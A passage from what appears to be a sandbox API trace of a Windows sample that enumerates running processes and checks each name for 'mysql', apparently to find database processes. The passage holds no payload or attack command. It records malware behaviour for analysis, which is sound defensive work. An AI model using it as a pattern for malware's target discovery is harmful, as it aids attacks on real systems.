lpUsedDefaultChar=0x0) returned 12 [0091.716] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3541a60 [0091.716] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x3541a60, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0091.716] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0091.716] StrStrIA (lpFirst="svchost.exe", lpSrch="mysql") returned 0x0 [0091.716] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0091.718] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="spoolsv.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0091.718] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3541b50 [0091.718] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="spoolsv.exe", cchWideChar=-1, lpMultiByteStr=0x3541b50, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spoolsv.exe", lpUsedDefaultChar=0x0) returned 12 [0091.718] lstrcpyA (in: lpString1=0x567fabc, lpString2="spoolsv.exe" | out: lpString1="spoolsv.exe") returned="spoolsv.exe" [0091.718] StrStrIA (lpFirst="spoolsv.exe", lpSrch="mysql") returned 0x0 [0091.718] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x69c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0091.719] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0091.720] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x35418c8 [0091.720] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x35418c8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0091.720] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0091.720] StrStrIA (lpFirst="svchost.exe", lpSrch="mysql") returned 0x0 [0091.720] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x554, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0091.721] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="audiodg.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0091.721] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3541880 [0091.721] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="audiodg.exe", cchWideChar=-1, lpMultiByteStr=0x3541880, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="audiodg.exe", lpUsedDefaultChar=0x0) returned 12 [0091.721] lstrcpyA (in: lpString1=0x567fabc, lpString2="audiodg.exe" | out: lpString1="audiodg.exe") returned="audiodg.exe" [0091.721] StrStrIA (lpFirst="audiodg.exe", lpSrch="mysql") returned 0x0 [0091.722] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x708, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x3ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0091.723] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="sihost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0091.723] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x3541928 [0091.723] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="sihost.exe", cchWideChar=-1, lpMultiByteStr=0x3541928, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sihost.exe", lpUsedDefaultChar=0x0) returned 11 [0091.723] lstrcpyA (in: lpString1=0x567fabc, lpString2="sihost.exe" | out: lpString1="sihost.exe") returned="sihost.exe" [0091.723] StrStrIA (lpFirst="sihost.exe", lpSrch="mysql") returned 0x0 [0091.723] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x720, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0091.725] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0091.725] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x35419d0 [0091.725] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x35419d0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0091.725] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0091.725] StrStrIA (lpFirst="svchost.exe", lpSrch="mysql") returned 0x0 [0091.725] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x3ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0091.726] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="taskhostw.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0091.726] LocalAlloc (uFlags=0x40, uBytes=0xe) returned 0x3541b68 [0091.726] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="taskhostw.exe", cchWideChar=-1, lpMultiByteStr=0x3541b68, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="taskhostw.exe", lpUsedDefaultChar=0x0) returned 14 [0091.726] lstrcpyA (in: lpString1=0x567fabc, lpString2="taskhostw.exe" | out: lpString1="taskhostw.exe") returned="taskhostw.exe" [0091.726] StrStrIA (lpFirst="taskhostw.exe", lpSrch="mysql") returned 0x0 [0091.726] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x560, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3c, th32ParentProcessID=0x568, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0091.727] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="explorer.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0091.728] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x3541b38 [0091.728] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="explorer.exe", cchWideChar=-1, lpMultiByteStr=0x3541b38, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="explorer.exe", lpUsedDefaultChar=0x0) returned 13 [0091.728] lstrcpyA (in: lpString1=0x567fabc, lpString2="explorer.exe" | out: lpString1="explorer.exe") returned="explorer.exe" [0091.728] StrStrIA (lpFirst="explorer.exe", lpSrch="mysql") returned 0x0 [0091.728] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x818, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0091.729] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="OfficeClickToRun.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0091.729] LocalAlloc (uFlags=0x40, uBytes=0x15) returned 0x355bb38 [0091.729] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="OfficeClickToRun.exe", cchWideChar=-1, lpMultiByteStr=0x355bb38, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OfficeClickToRun.exe", lpUsedDefaultChar=0x0) returned 21 [0091.729] lstrcpyA (in: lpString1=0x567fabc, lpString2="OfficeClickToRun.exe" | out: lpString1="OfficeClickToRun.exe") returned="OfficeClickToRun.exe" [0091.729] StrStrIA (lpFirst="OfficeClickToRun.exe", lpSrch="mysql") returned 0x0 [0091.729] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x84c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="SecurityHealthService.exe")) returned 1 [0091.730] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="SecurityHealthService.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 26 [0091.730] LocalAlloc (uFlags=0x40, uBytes=0x1a) returned 0x355c718 [0091.730] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="SecurityHealthService.exe", cchWideChar=-1, lpMultiByteStr=0x355c718, cbMultiByte=26, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SecurityHealthService.exe", lpUsedDefaultChar=0x0) returned 26 [0091.730] lstrcpyA (in: lpString1=0x567fabc, lpString2="SecurityHealthService.exe" | out: lpString1="SecurityHealthService.exe") returned="SecurityHealthService.exe" [0091.731] StrStrIA (lpFirst="SecurityHealthService.exe", lpSrch="mysql") returned 0x0 [0091.731] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x4, pcPriClassBase=8, dwFlags=0x0, szExeFile="Memory Compression")) returned 1 [0091.732] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="Memory Compression", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0091.732] LocalAlloc (uFlags=0x40, uBytes=0x13) returned 0x355b9d8 [0091.732] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="Memory Compression", cchWideChar=-1, lpMultiByteStr=0x355b9d8, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Memory Compression", lpUsedDefaultChar=0x0) returned 19 [0091.732] lstrcpyA (in: lpString1=0x567fabc, lpString2="Memory Compression" | out: lpString1="Memory Compression") returned="Memory Compression" [0091.732] StrStrIA (lpFirst="Memory Compression", lpSrch="mysql") returned 0x0 [0091.732] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb3c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x2a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0091.733] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="ShellExperienceHost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 24 [0091.733] LocalAlloc (uFlags=0x40, uBytes=0x18) returned 0x355b8d8 [0091.733] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="ShellExperienceHost.exe", cchWideChar=-1, lpMultiByteStr=0x355b8d8, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ShellExperienceHost.exe", lpUsedDefaultChar=0x0) returned 24 [0091.733] lstrcpyA (in: lpString1=0x567fabc, lpString2="ShellExperienceHost.exe" | out: lpString1="ShellExperienceHost.exe") returned="ShellExperienceHost.exe" [0091.733] StrStrIA (lpFirst="ShellExperienceHost.exe", lpSrch="mysql") returned 0x0 [0091.734] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x2a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0091.735] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="SearchUI.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0091.735] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x35419e8 [0091.735] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="SearchUI.exe", cchWideChar=-1, lpMultiByteStr=0x35419e8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SearchUI.exe", lpUsedDefaultChar=0x0) returned 13 [0091.735] lstrcpyA (in: lpString1=0x567fabc, lpString2="SearchUI.exe" | out: lpString1="SearchUI.exe") returned="SearchUI.exe" [0091.735] StrStrIA (lpFirst="SearchUI.exe", lpSrch="mysql") returned 0x0 [0091.735] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbe4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x2a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0091.736] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="RuntimeBroker.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0091.736] LocalAlloc (uFlags=0x40, uBytes=0x12) returned 0x355bb58 [0091.736] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="RuntimeBroker.exe", cchWideChar=-1, lpMultiByteStr=0x355bb58, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RuntimeBroker.exe", lpUsedDefaultChar=0x0) returned 18 [0091.736] lstrcpyA (in: lpString1=0x567fabc, lpString2="RuntimeBroker.exe" | out: lpString1="RuntimeBroker.exe") returned="RuntimeBroker.exe" [0091.736] StrStrIA (lpFirst="RuntimeBroker.exe", lpSrch="mysql") returned 0x0 [0091.736] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x2a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0091.752] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="WmiPrvSE.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0091.752] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x3541940 [0091.752] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="WmiPrvSE.exe", cchWideChar=-1, lpMultiByteStr=0x3541940, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WmiPrvSE.exe", lpUsedDefaultChar=0x0) returned 13 [0091.752] lstrcpyA (in: lpString1=0x567fabc, lpString2="WmiPrvSE.exe" | out: lpString1="WmiPrvSE.exe") returned="WmiPrvSE.exe" [0091.752] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="mysql") returned 0x0 [0091.752] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x38c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="pending.exe")) returned 1 [0091.754] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="pending.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0091.754] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3541a78 [0091.754] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="pending.exe", cchWideChar=-1, lpMultiByteStr=0x3541a78, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="pending.exe", lpUsedDefaultChar=0x0) returned 12 [0091.754] lstrcpyA (in: lpString1=0x567fabc, lpString2="pending.exe" | out: lpString1="pending.exe") returned="pending.exe" [0091.754] StrStrIA (lpFirst="pending.exe", lpSrch="mysql") returned 0x0 [0091.754] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="appointmentimpressed.exe")) returned 1 [0091.755] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="appointmentimpressed.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 25 [0091.755] LocalAlloc (uFlags=0x40, uBytes=0x19) returned 0x355c678 [0091.755] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="appointmentimpressed.exe", cchWideChar=-1, lpMultiByteStr=0x355c678, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="appointmentimpressed.exe", lpUsedDefaultChar=0x0) returned 25 [0091.755] lstrcpyA (in: lpString1=0x567fabc, lpString2="appointmentimpressed.exe" | out: lpString1="appointmentimpressed.exe") returned="appointmentimpressed.exe" [0091.755] StrStrIA (lpFirst="appointmentimpressed.exe", lpSrch="mysql") returned 0x0 [0091.755] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="swing prefer.exe")) returned 1 [0091.757] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="swing prefer.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0091.757] LocalAlloc (uFlags=0x40, uBytes=0x11) returned 0x355baf8 [0091.757] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="swing prefer.exe", cchWideChar=-1, lpMultiByteStr=0x355baf8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="swing prefer.exe", lpUsedDefaultChar=0x0) returned 17 [0091.757] lstrcpyA (in: lpString1=0x567fabc, lpString2="swing prefer.exe" | out: lpString1="swing prefer.exe") returned="swing prefer.exe" [0091.757] StrStrIA (lpFirst="swing prefer.exe", lpSrch="mysql") returned 0x0 [0091.757] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x384, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="vietnamese_mature_hat.exe")) returned 1 [0091.758] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="vietnamese_mature_hat.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 26 [0091.758] LocalAlloc (uFlags=0x40, uBytes=0x1a) returned 0x355c510 [0091.758] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="vietnamese_mature_hat.exe", cchWideChar=-1, lpMultiByteStr=0x355c510, cbMultiByte=26, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="vietnamese_mature_hat.exe", lpUsedDefaultChar=0x0) returned 26 [0091.758] lstrcpyA (in: lpString1=0x567fabc, lpString2="vietnamese_mature_hat.exe" | out: lpString1="vietnamese_mature_hat.exe") returned="vietnamese_mature_hat.exe" [0091.758] StrStrIA (lpFirst="vietnamese_mature_hat.exe", lpSrch="mysql") returned 0x0 [0091.758] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="nights-attending.exe")) returned 1 [0091.759] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="nights-attending.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0091.759] LocalAlloc (uFlags=0x40, uBytes=0x15) returned 0x355bb18 [0091.759] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="nights-attending.exe", cchWideChar=-1, lpMultiByteStr=0x355bb18, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="nights-attending.exe", lpUsedDefaultChar=0x0) returned 21 [0091.760] lstrcpyA (in: lpString1=0x567fabc, lpString2="nights-attending.exe" | out: lpString1="nights-attending.exe") returned="nights-attending.exe" [0091.760] StrStrIA (lpFirst="nights-attending.exe", lpSrch="mysql") returned 0x0 [0091.760] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x51c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="installed.exe")) returned 1 [0091.761] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="installed.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0091.761] LocalAlloc (uFlags=0x40, uBytes=0xe) returned 0x3541a00 [0091.761] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="installed.exe", cchWideChar=-1, lpMultiByteStr=0x3541a00, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="installed.exe", lpUsedDefaultChar=0x0) returned 14 [0091.761] lstrcpyA (in: lpString1=0x567fabc, lpString2="installed.exe" | out: lpString1="installed.exe") returned="installed.exe" [0091.761] StrStrIA (lpFirst="installed.exe", lpSrch="mysql") returned 0x0 [0091.761] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x794, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="references compounds.exe")) returned 1 [0091.762] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="references compounds.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 25 [0091.762] LocalAlloc (uFlags=0x40, uBytes=0x19) returned 0x355c4e8 [0091.762] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="references compounds.exe", cchWideChar=-1, lpMultiByteStr=0x355c4e8, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="references compounds.exe", lpUsedDefaultChar=0x0) returned 25 [0091.762] lstrcpyA (in: lpString1=0x567fabc, lpString2="references compounds.exe" | out: lpString1="references compounds.exe") returned="references compounds.exe" [0091.762] StrStrIA (lpFirst="references compounds.exe", lpSrch="mysql") returned 0x0 [0091.762] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x790, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="albuquerque_left.exe")) returned 1 [0091.764] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="albuquerque_left.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0091.764] LocalAlloc (uFlags=0x40, uBytes=0x15) returned 0x355b7d8 [0091.764] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="albuquerque_left.exe", cchWideChar=-1, lpMultiByteStr=0x355b7d8, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="albuquerque_left.exe", lpUsedDefaultChar=0x0) returned 21 [0091.764] lstrcpyA (in: lpString1=0x567fabc, lpString2="albuquerque_left.exe" | out: lpString1="albuquerque_left.exe") returned="albuquerque_left.exe" [0091.764] StrStrIA (lpFirst="albuquerque_left.exe", lpSrch="mysql") returned 0x0 [0091.764] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd18, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, 